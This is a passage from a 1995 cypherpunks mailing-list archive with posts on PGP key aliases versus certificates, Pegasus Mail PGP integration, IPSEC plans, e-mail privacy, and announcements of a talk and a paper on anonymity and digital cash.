MIME-Version: 1.0
Content-Type: text/plain


At 06:58 AM 11/28/95 -0600, (Bill) wrote:
>Who has the right to read your personal e-mail.
>E-mail created at work?
>E-mail downdloaded at work?
>E-mail stored on a PC at work? 

The December 1995 issue of Communications of the ACM (CACM) has several
articles on e-mail privacy.

Managing User Perceptions of Email Privacy
Suzanne P. Weisband and Bruce A. Reinig

The Ethical and Legal Quandary of Email Privacy
Janice C. Sipior and Burke T. Ward


--
John A. Limpert
johnl@Radix.Net





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 29 Nov 1995 00:50:29 +0800
To: cypherpunks@toad.com
Subject: NAV_dat
Message-ID: <199511281635.LAA13666@pipe3.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   Zero Kelvin crypto but The NYPaper hisses 28 Nov:

      The US Navy is starting to release a treasure trove of
      physical data about the sea that was gathered in secrecy
      during the long decades of the cold war, exciting
      scientists who see it as a bonanza for understanding
      environmental change. Over the decades, the Navy
      deployed thousands of ships, airplanes, submarines and
      satellites to collect such data. Usually kept secret,
      the archival readings are seen as unrivaled yardsticks
      for judging long-term processes of global climatic
      change and planetary warming. A geophysicist said the
      value of that data for scientific and commercial 
      exploitation is measured in billions of dollars.

   "Scientific Utility of Naval Environmental Data," a June,
   1995, 52-page appraisal by the Medea scientific advisory
   group, is available for free by telephoning (703) 883-5265
   voice or (703) 883-6190 fax.

   NAV_dat  (13 kb)












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Wed, 29 Nov 1995 03:51:22 +0800
To: cypherpunks@toad.com
Subject: Re: [NOISE, sorta] Re: Inexpensive Crypto Boxes...
Message-ID: <199511281935.LAA06806@ix11.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:04 AM 11/28/95 -0500, Mike Fletcher <fletch@ain.bls.com> wrote:
>	For those who don't know, the PSX is a CD based gaming console
>released (in the US) in Sept by Sony.  It's a MIPS R3000/25MHz processor
>with some SGI-designed polygon chips, 2x CD-ROM, 1M RAM, 2M video RAM.

There are a number of reasonably powerful game machines under $300,
though that uses TV-screen video, which isn't enough for decent text;
doing a $500 machine with a real monitor should be quite possible.
However, to make it functionally useful, it needs at least a connector
for a a disk drive - couch potato web-surfers can skip it, but anybody
who wants to do real work will spend the $100-300 to add a disk,
and probably add a CD-ROM as well.  Without a disk, you can't do
off-line reading, which significantly affects anyone using
pay-by-the-hour network access services.

(I used to use a diskless Sun with 40 MB RAM on an Ethernet, and it
was usually fine, but I was motivated by not wanting a fan on my computer...)

ObCrypto - you _can_ do decent crypto on a diskless machine as long as
you've got some non-volatile storage for keys; a few KB should do,
and the main applications would have to run in ROM.


>	The line between toy and real machine is getting more and 
>more fuzzy (we use a box here at work with the same processor to compile
>for an AT&T telephony switch (which tells you how sad the AT&T product
>is :) :))).  

Telephone switches don't need high-power CPU-crunchers, and the 
R3000 was quite a decent processor.  They need clean, stable CPUs
and appropriately-designed operating systems which are good at
controlling lots of polled I/O devices - it's a PDP-11 job,
rather than a Cray job.  Generally the OSs have been
hand-rolled, though it's becoming much more practical to use
Unix to develop user-interface applications now that processors
are fast enough to have short interrupt times.  The previous 
switches used Intel processors - 386s let you do more than 8086s,
pulling applications into the CPU instead of low-level logic.

>How long until the NSA tries a Chinese Lottery attack hidden
>inside a Nintendo cart?

You've read "The Hacker and the Ants", haven't you?  :-)
#--
#				Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@c2.org>
Date: Wed, 29 Nov 1995 04:03:41 +0800
To: Carl Ellison <cme@TIS.COM>
Subject: Re: The future will be easy to use
In-Reply-To: <9511281803.AA20521@tis.com>
Message-ID: <Pine.SUN.3.91.951128113331.17420A@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain




On Tue, 28 Nov 1995, Carl Ellison wrote:
> Raph Levien wrote:
> >   First, on what basis will users decide which keys are worthy of being
> >assigned which aliases?  Public keys are big hunks of base64 encoded
> >gibberish.  They are difficult to present in a user interface, difficult 
> >to communicate in alternate, known secure channels (such as telephone 
> >calls and face to face communication).  There is no way that a person 
> >could memorize one.
> 
> That's true.  What the user would have to see is some icon (or, for
> text-bound folks, a temporary unique string) until the user chooses and
> assigns the appropriate alias.  That icon would have no meaning by itself.
> It would acquire a meaning by being associated with some message or set of
> messages:
> 
> a) an attribute testimony (signed by someone with known authority to
> 	specify such an attribute -- the equivalent of a certificate)

This is the induction case, not the base case. It assumes that you've 
already got a bunch of trusted public keys in your database. It also 
assumes the willingness of the ownsers of those public keys to sign new 
keys. See, now they've got the same problem of trying to determine 
whether the key is valid. Turtles all the way down.

> b) a set of messages signed by the key in question (tying the key to
> 	the source material from which the user formed his/her impression
> 	of the sender)

There being no reason, of course, why Mallet couldn't just sign all that 
stuff with his own signature. Here, you're relying on the ability of data 
to authenticate itself.

I am simply proposing a third alternative that has neither of these
problems: a short unique name for the key. Its success relies on
alternate, non-digital forms of communication: the phone, ink-signed
paper, face to face, whatever. 

[complex stuff deleted - I only wanted to make a simple point]

Raph





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@c2.org>
Date: Wed, 29 Nov 1995 04:07:54 +0800
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: The future will be easy to use
In-Reply-To: <01HY6DPAY6HY8WYPWJ@mbcl.rutgers.edu>
Message-ID: <Pine.SUN.3.91.951128114347.17420B-100000@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain




On Tue, 28 Nov 1995, E. ALLEN SMITH wrote:

> 	If you'd like a non-programmer user to test out the user interface, I'm
> available to some degree if it's usable on a VAX (and to a lesser degree for
> MS-DOS). Given the number of people like me who are interacting using a non-GUI
> interface for various reasons (including using a mainframe for email), I would
> suggest not making it specifically GUI-dependant.

Unfortunately, it's _way_ too early to recruit volunteers to test out the 
user interface. But thanks.

Raph





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Lynne L. Harrison" <lharrison@mhv.net>
Date: Wed, 29 Nov 1995 01:52:28 +0800
To: cypherpunks@toad.com
Subject: Re: PGP hooks for Pegasus Mail?
Message-ID: <9511281715.AA23370@mhv.net>
MIME-Version: 1.0
Content-Type: text/plain


At 09:52 AM 11/28/95 +0000, you wrote:
>Anyone done anything regarding PGP hooks into Pegasus Mail?  I'm 
>running it at home now (SLIPped into my Linux box), and I'd like to 
>find a way to integrate PGP into Pegasus Mail.
>
>Thanks in advance for any replies...


Ed -

  I haven't heard of anything re: "PGP hooks into Pegasus Mail".  At one
time, Eudora and ViaCrypt were discussing it but, from what I heard, those
discussions fizzled out.
  The easiest way to *integrate* is to use a front end program.

Regards -
Lynne


*******************************************************
Lynne L. Harrison, Esq.   |     "The key to life:
Poughkeepsie, New York    |      - Get up;
E-mail:                   |      - Survive;
lharrison@mhv.net         |      - Go to bed."
*******************************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 29 Nov 1995 02:11:06 +0800
To: Jonathan Zamick <JonathanZ@consensus.com>
Subject: Re: The future will be easy to use
In-Reply-To: <v02120d00ace0f66694dc@[157.22.240.13]>
Message-ID: <199511281726.MAA00314@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Jonathan Zamick writes:
> I can't agree. The model of a successful enterprise includes feedback from
> different levels of participants.

This isn't an enterprise. The government is not a participant except
by their own desire to interfere.

> Regardless, the government will be taking a role in encryption.

What makes you say that? Besides, why would that be desirable on any
level?

The Government will try to set standards and we will ignore them until
they try to force them on us by law, period.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Wed, 29 Nov 1995 02:33:58 +0800
To: frantz@netcom.com
Subject: Re: Bitbux could eliminate some domestic currencies?
Message-ID: <01HY6DKHWT5S8WYPWJ@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"frantz@netcom.com" 27-NOV-1995 02:55:15.66

Gresham's law says that the bad money drives the good money out of
circulation.  Does this mean that real cash is better than ecash ;-).
------------------
	You may realize this (due to the smiley), but what Gresham's law says
is that hard to distinguish bad money druves good money out of circulation. If
something is distinguishable, then it works the other way around (see the
replacement of the ruble by the dollar in pre-modern Russia, for instance).
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Wed, 29 Nov 1995 02:32:01 +0800
To: raph@c2.org
Subject: Re: The future will be easy to use
Message-ID: <01HY6DPAY6HY8WYPWJ@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"raph@c2.org"  "Raph Levien" 27-NOV-1995 17:11:37.38

It _is_ doable. I know the skill is out there. Wei Dai, Eric Young, Peter
Gutmann, and others have proved themselves quit capable of writing good
solid code. Sameer Parekh has done an incredible job with PR. Phil Karn,
Dan Bernstein, and some others (who I'm not sure want to be named) are
talking to the government. GUI I'm less sure about, but I'd hope that some
cpunks would come out of the woodwork.
------------------
	If you'd like a non-programmer user to test out the user interface, I'm
available to some degree if it's usable on a VAX (and to a lesser degree for
MS-DOS). Given the number of people like me who are interacting using a non-GUI
interface for various reasons (including using a mainframe for email), I would
suggest not making it specifically GUI-dependant.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 29 Nov 1995 02:41:36 +0800
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.rutgers.edu>
Subject: Re: The future will be easy to use
In-Reply-To: <01HY6DPAY6HY8WYPWJ@mbcl.rutgers.edu>
Message-ID: <199511281748.MAA00358@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



"E. ALLEN SMITH" writes:
> Phil Karn, Dan Bernstein, and some others (who I'm not sure want to
> be named) are talking to the government.

If you call lawsuits "talking", not that talking is important.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Wed, 29 Nov 1995 02:51:34 +0800
To: perry@piermont.com
Subject: Re: The future will be easy to use
Message-ID: <01HY6EC7T4JI8WYPWJ@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"perry@piermont.com" 28-NOV-1995 12:49:12.47

"E. ALLEN SMITH" writes:
> Phil Karn, Dan Bernstein, and some others (who I'm not sure want to
> be named) are talking to the government.

If you call lawsuits "talking", not that talking is important.
-----------------
	Umm... I wasn't the one that wrote that. It was included in the
message to which I was replying.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 29 Nov 1995 02:52:12 +0800
To: Jonathan Zamick <JonathanZ@consensus.com>
Subject: Re: The future will be easy to use
In-Reply-To: <v02120d02ace0fcab0df8@[157.22.240.13]>
Message-ID: <199511281801.NAA00386@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Jonathan Zamick writes:
> This discussion was based on a group of people getting together to create
> a new easy to use package for handling keys and such. The government is
> going to try to take a dominant stance, and mandate elements of it.

So we can ignore tem. Big deal. They have no laws with which to
enforce their desires.

> However, it is possible, even in an antagonistic relationship, to develop
> positive feedback.

Who cares? An hour spent talking to an idiot from Washington is better
spent writing good code unless there is a law pending in congress, in
which case you are probably better off paying someone who knows what
they are doing to do the talking for you.

> Returning to the original topic though, do we want to get a smaller list
> together to spec out some ideas for the project that was discussed? A
> simple, transparent, tool which would allow people to use strong encryption
> without having to think about it?

You mean, like IPSEC/Photuris? I'll be running IPSEC (but sadly not
Photuris, although I'll be trying to port Aggelos Keromytis' version
at some point) on my laptop at the IETF meeting in Dallas (provided
that I can buy a laptop in time.)

There are three things we are currently missing in the architecture,
IMHO.

1) We need a certificate system to replace X.509 and that plays nicely
   with distributed databases.
2) We need to implement the Eastlake/Kaufman method for embedding
   certificates in the DNS or something similar.
3) We need a good entity naming model.

Given all those being implemented, sometime soon I can see people
telnetting or ftping hither and thither without ever noticing or
caring that their sessions are completely encrypted.

We also have the following need:

4) A good MIME mailer (that looks like NeXT Mail or something like it)
   which has hooks for something MOSSlike that uses the same
   certificate infrastructure described in 1-3 above.
5) SHTTP capable browsers that also use 1-3 listed above.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 29 Nov 1995 02:52:33 +0800
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.rutgers.edu>
Subject: Re: The future will be easy to use
In-Reply-To: <01HY6EC7T4JI8WYPWJ@mbcl.rutgers.edu>
Message-ID: <199511281802.NAA00401@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



I apologize. your inclusion style is unusual and confused me.

"E. ALLEN SMITH" writes:
> From:	IN%"perry@piermont.com" 28-NOV-1995 12:49:12.47
> 
> "E. ALLEN SMITH" writes:
> > Phil Karn, Dan Bernstein, and some others (who I'm not sure want to
> > be named) are talking to the government.
> 
> If you call lawsuits "talking", not that talking is important.
> -----------------
> 	Umm... I wasn't the one that wrote that. It was included in the
> message to which I was replying.
> 	-Allen
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@TIS.COM>
Date: Wed, 29 Nov 1995 03:00:20 +0800
To: raph@c2.org
Subject: Re: The future will be easy to use
In-Reply-To: <199511280009.QAA12863@comsec.com>
Message-ID: <9511281803.AA20521@tis.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>Date: Mon, 27 Nov 1995 11:06:13 -0800 (PST)
>From: Raph Levien <raph@c2.org>


>   Form this perspective, let's take a look at the recent thread on
>"establishing trust." Carl Ellison advocates the MOSS alias system. My
>understanding of this system is that individual users associate "aliases" 
>with public keys. If done right, it can work well. However, from a
>usability perspective, it is just one more trouble spot. 

Yes, it could easily be done wrong in such a way that the user gets
confused rather than helped; burdened rather than relieved.

I advocate aliases because that's how *I* think.  I think in words so I
assign my own names (aliases) for the people who populate my mental model
of the world.  By definition, these are all my correspondents.  It's
possible of course that some other people (of different Myers-Briggs type,
perhaps) think differently -- not in words or aliases.  If that's true, we
should find out how they think and associate the right thing for them.  For
example, I had a friend (a painter/sculpter) who thought in images.  She
might prefer to use little pictures or icons (of her own drawing) as the
aliases.

>   First, on what basis will users decide which keys are worthy of being
>assigned which aliases?  Public keys are big hunks of base64 encoded
>gibberish.  They are difficult to present in a user interface, difficult 
>to communicate in alternate, known secure channels (such as telephone 
>calls and face to face communication).  There is no way that a person 
>could memorize one.

That's true.  What the user would have to see is some icon (or, for
text-bound folks, a temporary unique string) until the user chooses and
assigns the appropriate alias.  That icon would have no meaning by itself.
It would acquire a meaning by being associated with some message or set of
messages:

a) an attribute testimony (signed by someone with known authority to
	specify such an attribute -- the equivalent of a certificate)

b) a set of messages signed by the key in question (tying the key to
	the source material from which the user formed his/her impression
	of the sender)

I, the user, would want to be able to call up the set of defining messages
for any key or alias at any time in the future -- just in case I get so
many aliases that I forget who one belongs to.

>   The other issue is how much time and energy the user has to spend 
>keeping the alias database up to date. There is no way to communicate 
>securely with anyone who's not in the database. If the user is 
>communicating with a large number of people, then it's very tempting to 
>get sloppy.

I keep a fairly large database of aliases already, in my .mailrc on UNIX.
Eudora permits a similar DB.  So do a number of other mailers.  Users must
be demanding this feature and using it.  All I say we have to add to that
is protection from tampering.

>   There's no way around it. This kind of system will not make it in the 
>big time.  

I wouldn't be so quick to dismiss it.

>	    As I see it, any system that does must have the following 
>properties:
>
>   * Some variant on the Web of Trust.

Of course -- you have to have some means for communicating and recording
attributions (that the person who owns a key is allowed to spend money on a
given bank account; that the person who owns a key goes by the name Carl or
receives mail at cme@acm.org; that the person who owns a key is a trusted
developer of PGP; ...).

>   * Online key-servers for getting keys in real time.
>   * A clean mechanism for validating keys through alternate channels.

These two have to go together -- but I'm curious what anyone means by
"validating keys".  I see this as the flaw killing certificate structures
like X.509 or PGP's.  [Even Steve Kent, a major X.509 advocate, seems to
see this problem (with sadness, in his case).]

I had a secretary once, long ago.  I would drive her home from work
occasionally -- or to parties -- when her husband wasn't around or wasn't
interested in going someplace.  One time, in passing, he noted that this
arrangement was OK with him because he "trusted her".  I trusted her, too.
I knew her to be having affairs with various people (not me at the time)
but he didn't.  So we each trusted her but what we trusted her to be was
different.  Just saying that we trusted her wasn't saying anything.

As soon as you qualify the "validated key" (e.g., to be allowed to spend
money, etc.), you get to the signed attributes which I advocate over
certificates.  If all you do with the validated key is tie it to a text
string which purports to specify a human being, as X.509 or PGP do, you
haven't done anything for me.  If all humans had unique names, then this
might mean something to me (assuming I knew the human in question and knew
his unique name).  However, that's what killed X.509 -- the need for unique
names.  We don't have them and we're not about to adopt some new social
structure which assigns them.  Even if we did all adopt unique names, you
postulated a *large* set of people to communicate with -- larger than my
immediate circle of acquaintances, presumably -- so even a unique name
would be meaningless to me because I would not have met the person in
question.  If the unique name certificate works at all it's because I have
some mechanism (not mentioned in the certificate hierarchy design) for
attaching attributes to the named person.  However, if I haven't met the
person in question, I don't have that mechanism already and it needs to be
created alongside the certificate mechanism.

I don't need testimony about the name (unique or otherwise) of the person
who owns that key.  I need testimony about the attributes of that person
(PGP developer; fellow Cypherpunk; FBI agent; undercover NSA plant;
permission to use a checking account; receives mail at xxx@yyy.com; ...).
That testimony can be provided by referencing the key itself, rather than
some (artificially unique) name which exists only to link the attribute to
the key.  The S/W which links these together and lets me find the various
testimonies for a key has to be convenient -- but that was your original
point and I concur.  I object only to the implication that current
certificate hierarchy thinking gets us closer to that goal than the direct
signed attribute statements would.

>   There are three possible outcomes: we build it, the NSA builds it, or 
>Microsoft/Netscape builds it. This last outcome might not be so bad, but 
>only in the first one can we rely on our principles being advanced.

Amen!

 - Carl

+--------------------------------------------------------------------------+
|Carl M. Ellison      cme@tis.com    http://www.clark.net/pub/cme	   |
|Trusted Information Systems, Inc.   http://www.tis.com/                   |
|3060 Washington Road          PGP 2.6.2:  61E2DE7FCB9D7984E9C8048BA63221A2|
|Glenwood MD  21738         Tel:(301)854-6889      FAX:(301)854-5363       |
+--------------------------------------------------------------------------+

- -----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMLtON1QXJENzYr45AQGiEwP+OpETJDPJ8rWbur4oH/PCZqKWtXmzTquV
4QIwoZlXoK6RnZ60szR/qqPxjnj+TtsO8FOQK5lWurv+FG67ma5PfyNbxU+WFapY
uxwop8Ivb3bw0uFT2oh2VE5owAYFkmqz7kd7GleEG33dGOUz7jSELugzL4Ag8zRF
40qPwsU7B08=
=aeKx
- -----END PGP SIGNATURE-----

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMLtOvVQXJENzYr45AQH5RQP+JroFSz3bJapOGEqA2pfhZ1dn9d7VDEUd
h/JLbhFkgYbzMGsVzpu20Ww0uOsOwxQR2ItLkaSlTG0O76rgATE2Cma9LEvdoque
LMgN/xg0GmaSHoecHLuKJxRz/1xreKODuai2FvndyjspfgO/H6zrQOfhsWn3qa6a
ZqnNaEY+kXw=
=cuUk
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Siberia" <klong@phoenix.net>
Date: Wed, 29 Nov 1995 03:44:32 +0800
To: cypherpunks@toad.com
Subject: Re: PGP hooks for Pegasus Mail?
Message-ID: <199511281905.NAA03947@phoenix.net>
MIME-Version: 1.0
Content-Type: text/plain


It is happening...about a week off from the first beta release.  Announcements 
will be posted to the Pegasus mail support lists and bit.listserv.pmail 
(as well as other appropriate posting spots).

>Anyone done anything regarding PGP hooks into Pegasus Mail?  I'm 
>running it at home now (SLIPped into my Linux box), and I'd like to 
>find a way to integrate PGP into Pegasus Mail.
>
>Thanks in advance for any replies...
> 
> Ed -

Namaste'

Kimberly Long
klong@phoenix.net

Standing on the bare ground...all mean egotism vanishes.  I become a
transparent eyeball; I am nothing; I see all; the currents of the
Universal Being circulate through me; I am part or particle of God.
~Ralph Waldo Emerson  )O( 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Wed, 29 Nov 1995 03:19:53 +0800
To: anonymous-remailer@shell.portal.com
Subject: Re: Cypherpunk Certification Authority
In-Reply-To: <199511281032.CAA21495@jobe.shell.portal.com>
Message-ID: <199511281813.NAA12568@homeport.org>
MIME-Version: 1.0
Content-Type: text


| > Well, signed Alice posts have shown up, so we will just have to assume
| > that the above was a spoof and that the signed Alice posts are the
| > real ones, now won't we?
| 
| Perry.  Normally I try my best to ignore you.
| 
| But I will simply repeat, I have never signed a post, and have no 
| intention of beginning to sign any posts, until I establish a secure 
| machine in a secure complex that is dedicated to that purpose.


	When did PGP claim to be perfect?  Its not; and the point is
not to obtain 100% confidence in someone, but a useable level of
confidence.  If the remailer chains work, then it would be tough to
find out who you are.  If we do find out who you are, your integrity
shell will tell you that your PGP binary was tampered with.  If we
don't know who you are, then your machine is safe from just about
anything other than a thorough sweep of all the net connected users in
Canada.

	So, please explain the threat that causes you to think that
'pretty good' is worthless in this context.

Adam
-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Wed, 29 Nov 1995 04:44:03 +0800
To: bsdc@ai.mit.edu
Subject: e$: Moof! (Hettinga Speaks at Apple)
Message-ID: <v02120d02ace116e8b837@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


God help us all.

I've been invited to the CyberDog Coding Retreat next week at Apple
Computer in Cupertino. Getting flown out there is cool. Hanging with the
more clueful Mac Internet types and getting to kibbitz and watch (I like to
watch!) them code OpenDoc parts for the internet from 8AM to midnight plus,
subsisting on Dew and Pizza is really way cool. Even getting some
mac.cypherpunks in the door to code cypto parts is extremely cool. But...

They've asked me to give a "talk". All by myself. In an auditorium. With an
audience, I mean. With publicity. I feel like Hoffman in Rain Man...
V-E-R-N, Verrrn... More to the point, I feel like I'm tempting fate,
here...

Sooo. I've been told I can have friends in the audience. That's cool. As
many friends as I want. That's even cooler. I can even have reinforcements
up on the rostrum. That's extremely cool.

So, while I work on the "reinforcements up on the rostrum" part, *please*
come and help me explain this stuff to the rest of the Apple community.

I've appended the actual poster copy, with the relevant details, below.
The poster, and its copyright-violating picture of Grommit the Dog are also
found on the web at:

http://thumper.vmeng.com/pub/rah/talk.html

Cheers,
Bob Hettinga


-----------------------


Geodesic Software and Financial Cryptography for Dogs
Robert Hettinga
12 PM, Dec 6th 1995, Town Hall, R&D4


Robert Hettinga (really, nobody you ever
heard of), will talk about the internet as a geodesic network and
information surfactant, about OpenDoc as geodesic software and code
surfactant, about really frightening stuff like strong cryptography on
public networks and the four horsemen of the infoclypse, about digital cash
and bearer certificates, and finally, about why teaching CyberDog how to do
financial cryptography is so important.

See this 350lb guy jump up and down and blather on for at least an hour
about anonymous transactions, about the disappearance of the capital
markets as as we know them, the rise and fall of the pyramid as communication
metaphor, and how to raise Bucky Fuller from the dead.

Learn why you should teach your code to surfact any application "suite" into
little bitty pieces, to send you cash in the mail no matter where you are,
and to make the whole status quo (everywhere!) disappear in a cloud of
self-organized chaos.

Cryptoanarchy. Right here in Cupertino, folks.

See you there...



-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971
"Reality is not optional." --Thomas Sowell
The e$ Home Page: http://www.webstuff.apple.com/~vinnie/Rah
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@TIS.COM>
Date: Wed, 29 Nov 1995 05:05:36 +0800
To: raph@c2.org
Subject: Re: The future will be easy to use
In-Reply-To: <Pine.SUN.3.91.951128113331.17420A@infinity.c2.org>
Message-ID: <9511282030.AA04051@tis.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>Date: Tue, 28 Nov 1995 11:43:34 -0800 (PST)
>From: Raph Levien <raph@c2.org>

>> It would acquire a meaning by being associated with some message or set of
>> messages:
>> 
>> a) an attribute testimony (signed by someone with known authority to
>> 	specify such an attribute -- the equivalent of a certificate)
>
>This is the induction case, not the base case. It assumes that you've 
>already got a bunch of trusted public keys in your database. It also 
>assumes the willingness of the ownsers of those public keys to sign new 
>keys. See, now they've got the same problem of trying to determine 
>whether the key is valid. Turtles all the way down.

Of course.  This isn't the base case.  We would have some keys which I sign
based on my own personal knowledge; things handed to me by people I know;
some possibly published in the paper where the real key owner would see the
claim and be able to contest it.  PGP today comes shipped with some keys to
provide the base for a chain of key signatures, but there's no verification
of PRZ's or JIS's keys.  One has to prime the mesh somehow.

I personally prime it by having some keys (or fingerprints) exchanged face
to face with people I know -- and having others acquired by association
with signed messages (b).  I don't have any yet whose trust has been
acquired by attribution (a), since we don't have that machinery set up yet.

BTW -- PGP currently lacks a way for me to note, when I sign a key, how it
is that I trust that key (by personal meeting, by attribution, by message
association, ...).  A signed attribute record would let me record that
information for myself as well as for others.

>> b) a set of messages signed by the key in question (tying the key to
>> 	the source material from which the user formed his/her impression
>> 	of the sender)
>
>There being no reason, of course, why Mallet couldn't just sign all that 
>stuff with his own signature. Here, you're relying on the ability of data 
>to authenticate itself.

Here I'm talking about people I "meet" and "get to know" based strictly on
my own e-mail conversations with them.  For such people, there is no other
evidence.  If it weren't for those messages, these people effectively
wouldn't exist in my world.  These messages define the people in question.

Stated another way:  I want to communicate with Alice.  I don't want to
communicate with Bob.  I've never met Alice but I have an address for her
and a public key.

	Alice --- Bob --- Carl

shows Bob as an active eavesdropper, controlling all of Alice's channels,
blocking release of her real key, announcing a key he controls under her
name to the rest of the world.  By contrast,

	Alice --- Bob --- Carl

shows Bob as Alice's secretary, who has been given the job, by Alice, of
reading all Alice's mail, choosing which to pass along to her and answering
all the others.  Alice has generated a key for herself and has given the
private key to Bob so that he can sign for her and read all her mail.
Alice could even have that key certified as hers within some massive X.509
hierarchy -- doing that before she gave the private key to Bob.

I know of no crypto protocol which will distinguish one from the other
unless I have a private channel to Alice at some time -- but that
contradicts the original assumption that I've never met her.

In both cases, the person I think of as Alice is really

	(Alice --- Bob) ---

and that's the "person" I learn to trust or not to trust.  That's the
"person" for whom I attach an alias to the public key.

 - Carl

+--------------------------------------------------------------------------+
|Carl M. Ellison      cme@tis.com    http://www.clark.net/pub/cme	   |
|Trusted Information Systems, Inc.   http://www.tis.com/                   |
|3060 Washington Road          PGP 2.6.2:  61E2DE7FCB9D7984E9C8048BA63221A2|
|Glenwood MD  21738         Tel:(301)854-6889      FAX:(301)854-5363       |
+--------------------------------------------------------------------------+


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMLtxOlQXJENzYr45AQFw4gP/es2salfOBrsPW3X1d+NnsBTThKJSkTYP
yCp7YZ9iIgBXnV/rQ3TcZg2Gbts/QwpUrqN7fQQ+tNazMxqomd3+Iz+5HPTU2jc7
5rW8p/dyq1vKGDgy+M4ohTLE9XXVJLJo3AwpUJeAhqd/SAUiJPTpdgggotnXfAeF
wWovhe3nq+U=
=jpzx
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Wed, 29 Nov 1995 05:15:04 +0800
To: cypherpunks <cypherpunks@toad.com>
Subject: Draft paper on anonymity, E$ and other stuff
Message-ID: <Pine.SUN.3.91.951128155759.9479T-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain



Now available for download: a draft of my latest paper, Flood Control on
the Information Ocean: Living With Anonymity, Digital Cash, and
Distributed Databases. 

I'd like your comments please, especially if you can send them soon. The
paper is available in a postscript file (966K) or a compressed postscript
file (253 K) by clicking on links from my homepage:

http://www.law.miami.edu/~froomkin/ocean.ps

http://www.law.miami.edu/~froomkin/ocean.ps.Z

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's warm here.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Wed, 29 Nov 1995 05:36:43 +0800
To: cypherpunks@toad.com
Subject: (fwd) Like FV with Crypto ... 'Cept Different ...
Message-ID: <v02120d00ace12b741277@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text

To: www-buyinfo <www-buyinfo@allegra.att.com>
From: Andrew Barrett/CheckFree Corporation
  <Andrew_Barrett@checkfree.com>
Date: 28 Nov 95  9:32:28 EDT
Subject: Like FV with Crypto ... 'Cept Different ...
Mime-Version: 1.0

 SAN RAFAEL, Calif., Nov. 22 /PRNewswire/  -- SBT's
Internet Division today announced that its electronic storefront package,
WebTrader 2.0, will integrate with Checkfree's credit card processing
service providing a complete, secure Internet commerce solution.  The
combination of SBT's WebTrader and Checkfree's Electronic Payment Processing
